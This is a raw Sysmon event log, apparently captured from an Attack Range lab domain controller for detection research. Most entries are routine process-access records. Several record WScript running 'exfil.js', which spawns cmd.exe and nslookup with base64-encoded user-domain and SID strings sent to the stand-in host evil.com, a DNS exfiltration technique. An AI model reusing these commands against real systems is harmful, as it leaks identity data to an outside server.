14:16:14.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.381{2E1864BB-17A1-629A-783D-000000005F02}55527780C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-933E-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.383{2E1864BB-17AE-629A-933E-000000005F02}420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzevrw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.366{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrdwhgto.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-17AE-629A-913E-000000005F02}80448080C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-923E-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-923E-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.349{2E1864BB-17AE-629A-903E-000000005F02}79887296C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-923E-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.352{2E1864BB-17AE-629A-923E-000000005F02}4156C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-903E-000000005F02}7988C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrdwhgto.tmp 2>&1 10341000x8000000000000000196087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.296{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-913E-000000005F02}8044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.296{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-913E-000000005F02}8044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.280{2E1864BB-17AE-629A-913E-000000005F02}80448080C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-903E-000000005F02}7988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.250{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-913E-000000005F02}8044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-903E-000000005F02}7988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.233{2E1864BB-17A1-629A-783D-000000005F02}55527688C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-903E-000000005F02}7988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.236{2E1864BB-17AE-629A-903E-000000005F02}7988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrdwhgto.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.218{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrnkc.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-17AE-629A-8E3E-000000005F02}54323384C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-8F3E-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-8F3E-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C: